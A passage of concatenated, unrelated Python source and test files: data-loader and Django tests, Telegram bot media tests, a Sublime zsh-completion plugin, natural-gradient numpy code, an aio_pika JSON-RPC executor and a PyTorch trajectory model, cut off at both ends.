with pytest.raises(ValueError, match="No column named NOT_EXIST found"):
X_y_from_file(ARFF_CJS, split_column="NOT_EXIST")
def test_X_y_from_file_default_split_column(self):
_, y = X_y_from_file(ARFF_CJS)
assert y.name == "INTERNODE_29"
class TestLoadFeatureMetadata:
def test_load_feature_metadata_from_arff(self):
meta = load_feature_metadata_from_arff(ARFF_CJS)
assert meta == METADATA_23380
def test_load_feature_metadata_from_arff_whitespace_in_feature_name(self):
meta = load_feature_metadata_from_arff(ARFF_BC)
assert "mean radius" in meta
def test_load_feature_metadata_from_file_arff(self):
meta = load_feature_metadata_from_file(ARFF_CJS)
assert meta == METADATA_23380
def test_load_feature_metadata_from_file_csv(self):
meta = load_feature_metadata_from_file(CSV_CJS)
assert list(meta) == list(METADATA_23380)
assert all(v == "" for v in meta.values())
def test_load_feature_metadata_from_file_txt(self):
with pytest.raises(ValueError, match="files supported."):
load_feature_metadata_from_file("myfile.txt")
class TestLoadCsvHeader:
def test_load_csv_header(self):
header = load_csv_header(CSV_CJS)
assert header == list(METADATA_23380)
def test_load_csv_header_semicolon_delimiter(self):
header = load_csv_header(CSV_SEMICOLON_CJS)
assert header == list(METADATA_23380)
def test_load_csv_header_no_header(self):
header = load_csv_header(CSV_NO_HEADER_CJS)
assert header == [str(i) for i, _ in enumerate(METADATA_23380)]
def test_load_csv_header_wrong_file_type(self):
with pytest.raises(ValueError, match=r"\S+ is not a file with .csv extension."):
load_csv_header(ARFF_CJS)
class TestFileToPandas:
def test_file_to_pandas_csv(self):
df = file_to_pandas(CSV_CJS_FULL)
_test_df_d23380(df)
def test_file_to_pandas_arff(self):
df = file_to_pandas(ARFF_CJS)
_test_df_d23380(df)
def test_file_to_pandas_invalid(self):
with pytest.raises(ValueError, match="files supported."):
file_to_pandas("myfile.txt")
class TestArffToPandas:
def test_arff_to_pandas(self):
dataframe = arff_to_pandas(ARFF_CJS)
_test_df_d23380(dataframe)
class TestCsvToPandas:
def test_csv_to_pandas(self):
df = csv_to_pandas(CSV_CJS_FULL)
_test_df_d23380(df)
def test_csv_to_pandas_semicolon(self):
df = csv_to_pandas(CSV_SEMICOLON_CJS)
assert (500, 35) == df.shape
def test_csv_to_pandas_no_header(self):
df = csv_to_pandas(CSV_NO_HEADER_CJS)
assert (500, 35) == df.shape
class TestSniffCsvMeta:
def test_sniff_csv_meta_with_header(self):
sep, header = sniff_csv_meta(CSV_CJS)
assert "," == sep
assert header
def test_sniff_csv_meta_with_semicolon(self):
sep, header = sniff_csv_meta(CSV_SEMICOLON_CJS)
assert ";" == sep
assert header
def test_sniff_csv_meta_no_header(self):
sep, header = sniff_csv_meta(CSV_NO_HEADER_CJS)
assert "," == sep
assert not header
|
469448
|
import os
import shutil
from test.utils import AbstractCatkinWorkspaceTest, TEMP_DIR, rosinstall, \
create_catkin_workspace
class AbstractUnstableTest(AbstractCatkinWorkspaceTest):
"""
Parent class for any Test case that download latest ros core
stacks from github to build custom stacks against that
"""
def __init__(self, testCaseName, name):
# for ROS core integration tests, we reuse the same sources
# (to save download time), keep in test folder
super(AbstractUnstableTest, self).__init__(
testCaseName, os.path.join(TEMP_DIR, name))
def setupWorkspaceContents(self):
rosinstall(self.workspacedir,
os.path.join(os.path.dirname(__file__),
'test.rosinstall'))
create_catkin_workspace(self.workspacedir)
def tearDown(self):
# override parent tearDown which would delete what we
# rosinstalled
pass
def delete_build(self):
"""
cleans the build folder, run manually in subtests when
appropriate. We don't to this in setup because it takes so
long to build all of ros core'
"""
if os.path.isdir(self.builddir):
shutil.rmtree(self.builddir)
|
469454
|
from pytgbot.exceptions import TgApiServerException
from somewhere import API_KEY, TEST_CHAT
import unittest
from luckydonaldUtils.logger import logging
from pytgbot.bot import Bot
from pytgbot.api_types.receivable.media import PhotoSize
from pytgbot.api_types.receivable.updates import Message
from pytgbot.api_types.sendable.files import InputFileFromURL
from pytgbot.api_types.sendable.input_media import InputMediaPhoto, InputMediaVideo
logging.add_colored_handler(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class BotTest(unittest.TestCase):
def setUp(self):
self.bot = Bot(API_KEY)
self.messages = []
# end def
def test_edit_message_media(self):
# upload by url
url1 = 'https://derpicdn.net/img/view/2012/1/22/1382.jpg'
url2 = 'https://derpicdn.net/img/view/2016/2/3/1079240.png'
msg = self.bot.send_photo(TEST_CHAT, url1, caption="unittest", disable_notification=True)
self.messages.append(msg)
print("msg 1: {!r}".format(msg))
self.assertIsInstance(msg, Message)
self.assertEqual(msg.caption, 'unittest')
self.assertIn('photo', msg)
self.assertIsInstance(msg.photo, list)
msg_id = msg.message_id
file_id = self._get_biggest_photo_fileid(msg)
# edit by url
msg2 = self.bot.edit_message_media(InputMediaPhoto(url2), TEST_CHAT, message_id=msg_id)
self.messages.append(msg2)
print("msg 2: {!r}".format(msg2))
self.assertIsInstance(msg2, Message)
self.assertIn('photo', msg2)
self.assertIsInstance(msg2.photo, list)
self.assertEqual(msg2.caption, None)
file_id2 = self._get_biggest_photo_fileid(msg2)
# edit by file_id
msg3 = self.bot.edit_message_media(InputMediaPhoto(file_id), TEST_CHAT, message_id=msg_id)
self.messages.append(msg3)
print("msg 3: {!r}".format(msg3))
self.assertIsInstance(msg3, Message)
self.assertIn('photo', msg3)
self.assertIsInstance(msg3.photo, list)
file_id3 = self._get_biggest_photo_fileid(msg3)
self.assertEqual(msg2.caption, None)
self.assertEqual(file_id3, file_id)
# edit by upload (url)
msg4 = self.bot.edit_message_media(InputMediaPhoto(InputFileFromURL(url2)), TEST_CHAT, message_id=msg_id)
self.messages.append(msg4)
print("msg 4: {!r}".format(msg4))
self.assertIsInstance(msg4, Message)
self.assertIn('photo', msg4)
self.assertIsInstance(msg4.photo, list)
self.assertEqual(msg4.caption, None)
file_id4 = self._get_biggest_photo_fileid(msg4)
self.messages.append(self.bot.send_message(TEST_CHAT, 'done.'))
# end def
def test_send_media_group(self):
url1 = 'https://derpicdn.net/img/view/2012/1/22/1382.jpg'
url2 = 'https://derpicdn.net/img/view/2016/2/3/1079240.png'
vid1 = 'https://derpicdn.net/img/view/2016/12/21/1322277.mp4'
pic1 = 'https://derpicdn.net/img/2017/7/21/1491832/thumb.jpeg'
stuff = [
InputMediaPhoto(url1, caption='1'),
InputMediaPhoto(InputFileFromURL(url1), caption='2'),
InputMediaVideo(vid1, caption='3'),
InputMediaVideo(InputFileFromURL(vid1), thumb=pic1, caption='4'),
InputMediaVideo(InputFileFromURL(vid1), thumb=InputFileFromURL(pic1), caption='5'),
]
msgs = self.bot.send_media_group(TEST_CHAT, stuff, disable_notification=True, )
self.messages.extend(msgs)
self.messages.append(self.bot.send_message(TEST_CHAT, 'done.'))
# end def
#
# utils:
#
def _get_biggest_photo_fileid(self, msg):
biggest = msg.photo[0]
for photo in msg.photo:
self.assertIsInstance(photo, PhotoSize)
if photo.file_size > biggest.file_size:
biggest = photo
# end if
# end for
return biggest.file_id
# end def
def tearDown(self):
if self.bot and self.messages:
for msg in reversed(self.messages):
try:
self.bot.delete_message(TEST_CHAT, msg.message_id)
except TgApiServerException as e:
if e.error_code == 400 and e.description == 'Bad Request: message to delete not found':
logger.info('delete message fail, not found.')
continue
# end if
logger.debug('delete message fail.', exc_info=True)
# end try
# end for
# end if
self.messages = []
# end def
# end class
if __name__ == '__main__':
unittest.main()
# end def
|
469481
|
from dynamo.tools.connectivity import _gen_neighbor_keys, check_and_recompute_neighbors, check_neighbors_completeness
from utils import *
import networkx as nx
import dynamo as dyn
import matplotlib.pyplot as plt
import numpy as np
def test_neighbors_subset(adata):
dyn.tl.neighbors(adata)
assert check_neighbors_completeness(adata)
indices = np.random.randint(0, len(adata), size=100)
_adata = adata[indices].copy()
assert not check_neighbors_completeness(_adata)
# check obsp keys subsetting by AnnData Obj
neighbor_result_prefix = ""
conn_key, dist_key, neighbor_key = _gen_neighbor_keys(neighbor_result_prefix)
check_and_recompute_neighbors(adata, result_prefix=neighbor_result_prefix)
expected_conn_mat = adata.obsp[conn_key][indices][:, indices]
expected_dist_mat = adata.obsp[dist_key][indices][:, indices]
print("expected_conn_mat:", expected_conn_mat.shape)
conn_mat = _adata.obsp[conn_key]
dist_mat = _adata.obsp[dist_key]
assert np.all(np.abs(expected_conn_mat - conn_mat.toarray()) < 1e-7)
assert np.all(expected_dist_mat == dist_mat.toarray())
# recompute and neighbor graph should be fine
dyn.tl.neighbors(_adata)
assert check_neighbors_completeness(_adata)
def test_broken_neighbors_check_recompute(adata):
dyn.tl.neighbors(adata)
assert check_neighbors_completeness(adata)
indices = np.random.randint(0, len(adata), size=100)
_adata = adata[indices].copy()
assert not check_neighbors_completeness(_adata)
check_and_recompute_neighbors(_adata)
assert check_neighbors_completeness(_adata)
def test_neighbors_no_pca_key():
adata = dyn.sample_data.zebrafish()
dyn.tl.neighbors(adata)
if __name__ == "__main__":
# generate data if needed
adata = gen_or_read_zebrafish_data()
test_neighbors_subset(adata)
test_broken_neighbors_check_recompute(adata)
test_neighbors_no_pca_key()
|
469518
|
def is_alphanumeric(word: str, valid_punctuation_marks: str = '-') -> bool:
"""
Check if a word contains only alpha-numeric
characters and valid punctuation marks.
Parameters
----------
word: `str`
The given word
valid_punctuation_marks: `str`
Punctuation marks that are valid, defaults to `'-'`.
Returns
-------
result: `bool`
The result
"""
for punctuation_mark in valid_punctuation_marks.split():
word = word.replace(punctuation_mark, '')
return word.isalnum()
|
469526
|
from Globals import *
@block
def TextBox(clk, X, Y, Loc, TextColor, charLoc, char, charColor, OEn, Ram, Clear):
x, y,rowNum = (Signal(modbv(0)[WHb:]) for i in range(3))
clrCNT = Signal(modbv(0)[12:0])
@always_seq(clk.posedge, reset=None)
def Seq():
if (x[4:] == 0 and (x >> 4) < 64) and y < 16 * 32:
charLoc.x.next = Loc.x + x
charLoc.y.next = Loc.y + (rowNum << 4)
if (x >> 4) < 64 and y < 16 * 32:
OEn.next = 1
else:
OEn.next = 0
if clrCNT == 2048:
clrCNT.next = 0
elif Clear or clrCNT > 0:
clrCNT.next = clrCNT + 1
else:
clrCNT.next = 0
@always_comb
def Comb():
x.next = X - Loc.x
y.next = Y - Loc.y
charColor.R.next = TextColor.R
charColor.G.next = TextColor.G
charColor.B.next = TextColor.B
@always_comb
def Comb1():
rowNum.next = y >> 4
@always_comb
def Comb2():
if clrCNT > 0:
Ram.we.next = 1
Ram.addr.next = clrCNT - 1
else:
Ram.addr.next = (x >> 4) + (rowNum << 6)
Ram.we.next = 0
char.next = Ram.dout[8:]
Ram.din.next = 0
return instances()
|
469570
|
import pytest
from saq.constants import *
from saq.indicators import Indicator, IndicatorList
from saq.tip import tip_factory
@pytest.mark.unit
def test_indicator_creation():
indicator = Indicator('test_type', 'test_value', status='test_status', tags=['test_tag1', 'test_tag2'])
assert indicator.type == 'test_type'
assert indicator.value == 'test_value'
assert indicator.status == 'test_status'
assert indicator.tags == ['test_tag1', 'test_tag2']
assert indicator.json == {
'type': 'test_type',
'value': 'test_value',
'status': 'test_status',
'tags': [
'test_tag1',
'test_tag2'
]
}
@pytest.mark.unit
def test_indicator_equal():
indicator1 = Indicator('test_type', 'test_value', status='test_status', tags=['test_tag1', 'test_tag2'])
indicator2 = Indicator('test_type', 'test_value')
assert indicator1 == indicator2
@pytest.mark.unit
def test_indicator_from_dict():
indicator_dict = {'type': 'email-src', 'value': '<EMAIL>', 'tags': ['test_tag1', 'test_tag2']}
indicator = Indicator.from_dict(indicator_dict)
assert isinstance(indicator, Indicator)
assert indicator.type == indicator_dict['type']
assert indicator.value == indicator_dict['value']
assert indicator.status == 'New'
assert indicator.tags == indicator_dict['tags']
@pytest.mark.unit
def test_indicatorlist_append():
indicators = IndicatorList()
assert len(indicators) == 0
indicator1 = Indicator('test_type', 'test_value', tags=['test_tag1'])
indicators.append(indicator1)
assert len(indicators) == 1
indicator2 = Indicator('test_type', 'test_value', tags=['test_tag2'])
indicators.append(indicator2)
assert len(indicators) == 1
assert indicators[0].tags == ['test_tag1', 'test_tag2']
@pytest.mark.unit
def test_indicatorlist_url_iocs(tip_misp):
indicators = IndicatorList()
indicators.add_url_iocs('http://www.test.com/index.html')
expected_iocs = [
Indicator(tip_misp.ioc_type_mappings[I_URL], 'http://www.test.com/index.html'),
Indicator(tip_misp.ioc_type_mappings[I_DOMAIN], 'www.test.com'),
Indicator(tip_misp.ioc_type_mappings[I_DOMAIN], 'test.com'),
Indicator(tip_misp.ioc_type_mappings[I_URI_PATH], '/index.html')
]
assert set(indicators) == set(expected_iocs)
|
469580
|
import os
from django.db.models import FilePathField
from django.test import SimpleTestCase
class FilePathFieldTests(SimpleTestCase):
def test_path(self):
path = os.path.dirname(__file__)
field = FilePathField(path=path)
self.assertEqual(field.path, path)
self.assertEqual(field.formfield().path, path)
def test_callable_path(self):
path = os.path.dirname(__file__)
def generate_path():
return path
field = FilePathField(path=generate_path)
self.assertEqual(field.path(), path)
self.assertEqual(field.formfield().path, path)
|
469640
|
from pngparser import PngParser
import sys
def remove_idats(png):
header = png.get_header()
img = png.get_image_data()
height = header.height
rows_count = len(img.scanlines)
print(f"[!] Height: {height}, real size: {rows_count}")
img.scanlines = img.scanlines[:height] # remove data out of image bounds
png.set_image_data(img)
if __name__ == "__main__":
png = PngParser(sys.argv[1])
remove_idats(png)
png.save_file("out.png")
print('[*] Done')
|
469645
|
from pycparser import c_parser, c_ast, c_generator
from copy import deepcopy
def rename_function_calls():
pass
def remove_input_port(func_def, ele_name, inports):
func_def.decl.name = ele_name
func_def.decl.type.type.declname = ele_name
stmts = func_def.body.block_items
new_stmts = []
port2args = {}
for stmt in stmts:
if type(stmt) == c_ast.Decl and type(stmt.init) == c_ast.FuncCall:
funccall = stmt.init
funcname = funccall.name.name
if funcname in inports:
if funccall.args:
raise Exception("Cannot pass an argument when retrieving data from an input port.")
myDecl = deepcopy(stmt)
myDecl.init = None
port2args[funcname] = myDecl
continue
new_stmts.append(stmt)
func_def.body.block_items = new_stmts
params = [port2args[x] for x in inports]
print func_def.decl.type.args
func_def.decl.type.args = c_ast.ParamList(params)
func_def.show()
def test():
src = r'''
run(int xxx) {
int i = in();
out(i+1);
}
'''
parser = c_parser.CParser()
ast = parser.parse(src)
print ast.ext
ast.show()
remove_input_port(ast.ext[0], "element", ["in"])
generator = c_generator.CGenerator()
print generator.visit(ast)
test()
|
469654
|
import re
import subprocess
import os
import sublime
import sublime_plugin
import pprint
pp = pprint.PrettyPrinter(indent=4)
def debug_message(msg):
print("[ZSH] " + str(msg))
# Get the current selection range
def sel_start(sel):
return min(sel.a, sel.b)
def sel_end(sel):
return max(sel.a, sel.b)
# Retrieve completion results for the current line
def get_completions(view, prefix):
# Set the working directory for the view
workingDir = None
if view.file_name() != None:
path = os.path.normpath(view.file_name())
workingDir = os.path.dirname(path)
# Get the full content of the line
sel = sel_start(view.sel()[0])
line = view.substr(view.line(sel))
# Build the path to the capture script
script = os.path.normpath(os.path.dirname(__file__)+"/capture.zsh")
# Add each word of the current line as arguments
cmd = [script] + line.split()
# Set process info for windows
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
info.dwFlags |= subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = subprocess.SW_HIDE
# Run the capture script
proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=info, cwd=workingDir)
# Get the results from stdout
if proc.stdout:
data = proc.communicate()[0]
if data is None: return None
# Put each line of the results into a list
lines = str(data, encoding='utf8').split("\r\n")
found = []
completions = []
# Loop through each of the line
for line in lines:
# The output format is 'word -- description'
bits = line.split(" -- ", 1)
word = bits[0]
# Only include completion results which begin with the characters
# we have entered
if word.find(prefix) == 0:
# If we've already found this word, skip it
if word in found:
continue
# Add the word to the 'found' list so that we can remove duplicates
found.append(word)
# Check if the result has a description, and then add the
# word to the completion list
if len(bits) > 1:
description = bits[1]
completions.append([word+"\t"+description, word])
else:
completions.append([word, word])
return completions
class Listeners(sublime_plugin.EventListener):
def on_query_completions(self, view, prefix, _locations):
sel = sel_start(view.sel()[0])
if view.score_selector(sel, 'source.shell') == 0: return None
if view.score_selector(sel, 'string.quoted') > 0: return None
if view.score_selector(sel, 'comment') > 0: return None
completions = get_completions(view, prefix)
if completions is None: return None
return completions
|
469668
|
import numpy as np
from functools import partial
NG_EXACT = 'exact'
NG_BD = 'block_diagonal'
NG_BTD = 'block_tri_diagonal'
NG_KFAC = 'kfac'
__all__ = [
'init_ntk_mlp',
'forward_and_backward',
'empirical_kernel',
'gradient_mse',
'natural_gradient_mse',
'exact_natural_gradient_mse',
'block_wise_natural_gradient_mse',
'kfac_mse'
]
def activation(inputs, name='relu'):
if name == 'relu':
derivatives = inputs > 0
outputs = inputs * derivatives
return outputs, derivatives
else:
raise ValueError(f'Invalid activation name: {name}.')
def init_ntk_mlp(M3, M2, M1, M0, W_std=1., b_std=0., random_seed=0):
"""Initialize weights and biases of NTK-parameterization."""
np.random.seed(random_seed)
W3 = np.random.randn(M3, M2).astype(np.float32) * W_std / np.sqrt(M2)
W2 = np.random.randn(M2, M1).astype(np.float32) * W_std / np.sqrt(M1)
W1 = np.random.randn(M1, M0).astype(np.float32) * W_std / np.sqrt(M0)
b3 = np.random.randn(M3).astype(np.float32) * b_std
b2 = np.random.randn(M2).astype(np.float32) * b_std
b1 = np.random.randn(M1).astype(np.float32) * b_std
return W3, W2, W1, b3, b2, b1
def forward_and_backward(x, W1, W2, W3, backward=True, kfac=False):
"""
Simple MLP with three layers.
x -> (W1) -> u1 -> (relu) -> h1 -> (W2) -> u2
-> (relu) -> h2 -> (W3) -> f
"""
act_fn = partial(activation, name='relu')
N = x.shape[0]
# forward
u1 = np.einsum('ab,nb->na', W1, x)
h1, d_h1 = act_fn(u1)
del u1
u2 = np.einsum('ab,nb->na', W2, h1)
h2, d_h2 = act_fn(u2)
del u2
f = np.einsum('ab,nb->na', W3, h2)
if not backward:
return f
M3 = W3.shape[0]
# back-propagate Jacobian of fx
if kfac:
J_h2 = W3
J_u2 = np.einsum('ab,nb->nab', J_h2, d_h2)
J_h1 = np.einsum('nab,bc->nac', J_u2, W2)
J_u1 = np.einsum('nab,nb->nab', J_h1, d_h1)
return f, h1, h2, J_u1, J_u2
else:
J_W3 = np.kron(np.eye(M3, dtype=h2.dtype), h2)
J_h2 = W3
J_u2 = np.einsum('ab,nb->nab', J_h2, d_h2)
del J_h2, d_h2
J_W2 = np.einsum('nab,nc->nabc', J_u2, h1).reshape(N * M3, -1)
del h1
J_h1 = np.einsum('nab,bc->nac', J_u2, W2)
del J_u2
J_u1 = np.einsum('nab,nb->nab', J_h1, d_h1)
del d_h1
J_W1 = np.einsum('nab,nc->nabc', J_u1, x).reshape(N * M3, -1)
del J_u1
return f, J_W1, J_W2, J_W3
def empirical_kernel(x1, x2, w_var, W1, W2, W3, ng_type):
_, J_W1_1, J_W2_1, J_W3_1 = forward_and_backward(x1, W1, W2, W3)
if x2 is None:
J_W1_2, J_W2_2, J_W3_2 = J_W1_1, J_W2_1, J_W3_1
N = x1.shape[0]
else:
_, J_W1_2, J_W2_2, J_W3_2 = forward_and_backward(x2, W1, W2, W3)
N = np.sqrt(x1.shape[0] * x2.shape[0])
M0 = W1.shape[-1]
M1 = W2.shape[-1]
M2 = W3.shape[-1]
Th1 = w_var * np.dot(J_W1_1, J_W1_2.T) / (N * M0)
Th2 = w_var * np.dot(J_W2_1, J_W2_2.T) / (N * M1)
Th3 = w_var * np.dot(J_W3_1, J_W3_2.T) / (N * M2)
Th1 = Th1.astype(J_W1_1.dtype)
Th2 = Th2.astype(J_W2_1.dtype)
Th3 = Th3.astype(J_W3_1.dtype)
if ng_type == NG_EXACT:
return Th1 + Th2 + Th3
return Th1, Th2, Th3
def gradient_mse(x, y, w_var, W1, W2, W3):
"""
Gradient.
"""
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).reshape(-1, 1)
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
g1 = np.dot(J_W1.T, gx)
g2 = np.dot(J_W2.T, gx)
g3 = np.dot(J_W3.T, gx)
dW1 = w_var * g1.reshape(W1.shape) / (N * M0)
dW2 = w_var * g2.reshape(W2.shape) / (N * M1)
dW3 = w_var * g3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def natural_gradient_mse(ng_type, *args, **kwargs):
if ng_type == NG_EXACT:
return exact_natural_gradient_mse(*args, **kwargs)
elif ng_type in [NG_BD, NG_BTD]:
return block_wise_natural_gradient_mse(ng_type, *args, **kwargs)
elif ng_type == NG_KFAC:
return kfac_mse(*args, **kwargs)
else:
raise ValueError(f'Invalid ng_type: {ng_type}.')
def exact_natural_gradient_mse(x, y, w_var, W1, W2, W3, damping):
"""
Exact natural-gradient.
"""
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).flatten()
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
M3 = W3.shape[0]
Th = empirical_kernel(x, None, w_var, W1, W2, W3, NG_EXACT)
I = np.eye(N * M3)
Th += damping * I
Th_inv_dot_gx = np.linalg.solve(Th, gx)
v1 = np.dot(J_W1.T, Th_inv_dot_gx)
v2 = np.dot(J_W2.T, Th_inv_dot_gx)
v3 = np.dot(J_W3.T, Th_inv_dot_gx)
dW1 = w_var * v1.reshape(W1.shape) / (N * M0)
dW2 = w_var * v2.reshape(W2.shape) / (N * M1)
dW3 = w_var * v3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def block_wise_natural_gradient_mse(ng_type, x, y, w_var, W1, W2, W3, damping):
fx, J_W1, J_W2, J_W3 = forward_and_backward(x, W1, W2, W3)
gx = (fx - y).flatten()
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
M3 = W3.shape[0]
# layer-wise empirical kernels
Th1, Th2, Th3 = empirical_kernel(x, None, w_var, W1, W2, W3, ng_type)
if ng_type == NG_BD:
"""
Block-diagonal natural-gradient.
"""
I = np.eye(N * M3)
Th1 += damping * I
Th2 += damping * I
Th3 += damping * I
v1 = np.dot(J_W1.T, np.linalg.solve(Th1, gx))
v2 = np.dot(J_W2.T, np.linalg.solve(Th2, gx))
v3 = np.dot(J_W3.T, np.linalg.solve(Th3, gx))
else:
"""
Block-tridiagonal natural-gradient.
"""
n_layers = 3
O = np.zeros((N * M3, N * M3)).astype(Th1.dtype)
I = np.eye(N * M3 * n_layers).astype(Th1.dtype)
mat = np.block(
[[Th1, Th2, O],
[Th1, Th2, Th3],
[O, Th2, Th3]]
).astype(Th1.dtype)
mat += damping * I
gx = np.stack([gx, gx, gx]).reshape(N * M3 * n_layers, 1)
v = np.linalg.solve(mat, gx)
v = np.split(v, n_layers)
v1 = np.dot(J_W1.T, v[0])
v2 = np.dot(J_W2.T, v[1])
v3 = np.dot(J_W3.T, v[2])
dW1 = w_var * v1.reshape(W1.shape) / (N * M0)
dW2 = w_var * v2.reshape(W2.shape) / (N * M1)
dW3 = w_var * v3.reshape(W3.shape) / (N * M2)
return dW1, dW2, dW3
def kfac_mse(x, y, w_var, W1, W2, W3, damping):
"""
K-FAC.
"""
# only support binary classification
assert y.shape[-1] == 1, 'Only binary classification is supported for K-FAC.'
fx, h1, h2, J_u1, J_u2 = forward_and_backward(x, W1, W2, W3, kfac=True)
gx = fx - y
N, M0 = x.shape
M1 = W1.shape[0]
M2 = W2.shape[0]
J_u1 = J_u1.reshape(-1, M1)
J_u2 = J_u2.reshape(-1, M2)
def get_A_and_B_inv(h, d, M_in, M_out):
# compute damping for A and B
A_dual = (w_var ** 2 / N / M_in) * np.dot(h, h.T)
B_dual = (1 / N) * np.dot(d, d.T)
A_avg_trace = np.trace(A_dual) / M_in
B_avg_trace = np.trace(B_dual) / M_out
pi = np.sqrt(A_avg_trace / B_avg_trace)
I = np.eye(N, N)
A_dmp = I * np.sqrt(damping) * pi
B_dmp = I * np.sqrt(damping) * (1 / pi)
A_inv = np.dot(h.T, np.linalg.inv(np.dot(h, h.T) * (1/N) + A_dmp))
B_inv = np.dot(d.T, np.linalg.inv(np.dot(d, d.T) * (1/N) + B_dmp))
return A_inv, B_inv
A0_inv, B1_inv = get_A_and_B_inv(x, J_u1, M0, M1)
A1_inv, B2_inv = get_A_and_B_inv(h1, J_u2, M1, M2)
dmp = np.eye(N, N) * damping
A2_inv = np.dot(h2.T, np.linalg.inv(np.dot(h2, h2.T) * (1/N) + dmp))
v1 = np.einsum('in,jn,nk->ijk', B1_inv, A0_inv, gx)
v2 = np.einsum('in,jn,nk->ijk', B2_inv, A1_inv, gx)
v3 = np.einsum('jn,nk->jk', A2_inv, gx) * 1/N
dW1 = w_var * v1.reshape(W1.shape) / np.sqrt(M0)
dW2 = w_var * v2.reshape(W2.shape) / np.sqrt(M1)
dW3 = w_var * v3.reshape(W3.shape) / np.sqrt(M2)
return dW1, dW2, dW3
|
469671
|
import logging
from typing import Any, Dict, Optional
import aio_pika
import pjrpc
logger = logging.getLogger(__package__)
class Executor:
"""
`aio_pika <https://aio-pika.readthedocs.io/en/latest/>`_ based JSON-RPC server.
:param broker_url: broker connection url
:param queue_name: requests queue name
:param prefetch_count: worker prefetch count
:param kwargs: dispatcher additional arguments
"""
def __init__(self, broker_url: str, queue_name: str, prefetch_count: int = 0, **kwargs: Any):
self._broker_url = broker_url
self._queue_name = queue_name
self._prefetch_count = prefetch_count
self._connection = aio_pika.connection.Connection(broker_url)
self._channel: Optional[aio_pika.Channel] = None
self._queue: Optional[aio_pika.Queue] = None
self._consumer_tag: Optional[str] = None
self._dispatcher = pjrpc.server.AsyncDispatcher(**kwargs)
@property
def dispatcher(self) -> pjrpc.server.AsyncDispatcher:
"""
JSON-RPC method dispatcher.
"""
return self._dispatcher
async def start(self, queue_args: Optional[Dict[str, Any]] = None) -> None:
"""
Starts executor.
:param queue_args: queue arguments
"""
await self._connection.connect()
self._channel = await self._connection.channel()
self._queue = await self._channel.declare_queue(self._queue_name, **(queue_args or {}))
await self._channel.set_qos(prefetch_count=self._prefetch_count)
self._consumer_tag = await self._queue.consume(self._rpc_handle)
async def shutdown(self) -> None:
"""
Stops executor.
"""
if self._consumer_tag:
await self._queue.cancel(self._consumer_tag)
if self._channel:
await self._channel.close()
await self._connection.close()
async def _rpc_handle(self, message: aio_pika.IncomingMessage) -> None:
"""
Handles JSON-RPC request.
:param message: incoming message
"""
try:
reply_to = message.reply_to
response_text = await self._dispatcher.dispatch(message.body, context=message)
if response_text is not None:
if reply_to is None:
logger.warning("property 'reply_to' is missing")
else:
async with self._connection.channel() as channel:
await channel.default_exchange.publish(
aio_pika.Message(
body=response_text.encode(),
reply_to=reply_to,
correlation_id=message.correlation_id,
content_type='application/json',
),
routing_key=reply_to,
)
message.ack()
except Exception as e:
logger.exception("jsonrpc request handling error: %s", e)
|
469688
|
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as data
import numpy as np
import torch
import torch.nn.utils.rnn as RNNUtils
import sys
import deepracing_models.math_utils as mu
import math
class VariationalCurvePredictor(nn.Module):
def __init__(self, input_channels=3, bezier_order=7, fix_first_point=False,\
context_length = 5, hidden_dim = 200, num_recurrent_layers = 1, rnn_bidirectional=False, \
additional_rnn_calls=25, output_dimension = 2, use_3dconv=True):
super(VariationalCurvePredictor, self).__init__()
self.imsize = (66,200)
self.input_channels = input_channels
self.fix_first_point = fix_first_point
self.bezier_order = bezier_order
self.params_per_dimension = self.bezier_order + 1 - int(fix_first_point)
self.context_length = context_length
self.num_recurrent_layers = num_recurrent_layers
self.output_dimension = output_dimension
#activations
self.relu = nn.ReLU()
self.tanh = nn.Tanh()
self.sigmoid = nn.Sigmoid()
self.activations = nn.ModuleDict({"relu": self.relu, "tanh": self.tanh, "sigmoid": self.sigmoid})
# Convolutional layers.
self.conv1 = nn.Conv2d(self.input_channels, 24, kernel_size=5, stride=2)
self.Norm_1 = nn.BatchNorm2d(24)
self.conv2 = nn.Conv2d(24, 36, kernel_size=5, stride=2)
self.Norm_2 = nn.BatchNorm2d(36)
self.conv3 = nn.Conv2d(36, 48, kernel_size=5, stride=2)
self.Norm_3 = nn.BatchNorm2d(48)
self.conv4 = nn.Conv2d(48, 64, kernel_size=3)
self.Norm_4 = nn.BatchNorm2d(64)
self.conv5 = nn.Conv2d(64, 64, kernel_size=3)
self.Norm_5 = nn.BatchNorm2d(64)
self.state_encoder = torch.nn.Sequential(*[
self.conv1,
self.Norm_1,
self.conv2,
self.Norm_2,
self.conv3,
self.Norm_3,
self.conv4,
self.Norm_4,
self.conv5,
self.Norm_5
])
self.img_features = 1*64*18
self.projection_features = 240*self.context_length * 3 * 20
self.additional_rnn_calls = additional_rnn_calls
self.intermediate_projection_size = int(self.projection_features/self.additional_rnn_calls)
self.use_3dconv = use_3dconv
if self.use_3dconv:
#projection encoder
self.conv3d1 = nn.Conv3d(input_channels, 10, kernel_size=(5,3,3), stride = (1,2,2), padding=(2,0,0) )
self.Norm3d_1 = nn.BatchNorm3d(10)
self.conv3d2 = nn.Conv3d(10, 20, kernel_size=(5,3,3), stride = (1,2,2), padding=(2,0,0) )
self.Norm3d_2 = nn.BatchNorm3d(20)
self.conv3d3 = nn.Conv3d(20, 40, kernel_size=(3,3,3), stride = (1,2,2), padding=(1,0,0) )
self.Norm3d_3 = nn.BatchNorm3d(40)
self.Pool3d_1 = torch.nn.MaxPool3d(3, stride=(1,1,1), padding=(1,0,0) )
self.conv3d4 = nn.Conv3d(40, 120, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
self.Norm3d_4 = nn.BatchNorm3d(120)
self.conv3d5 = nn.Conv3d(120, 120, kernel_size=(3,3,3), stride = (1,1,1), padding=(1,1,1) )
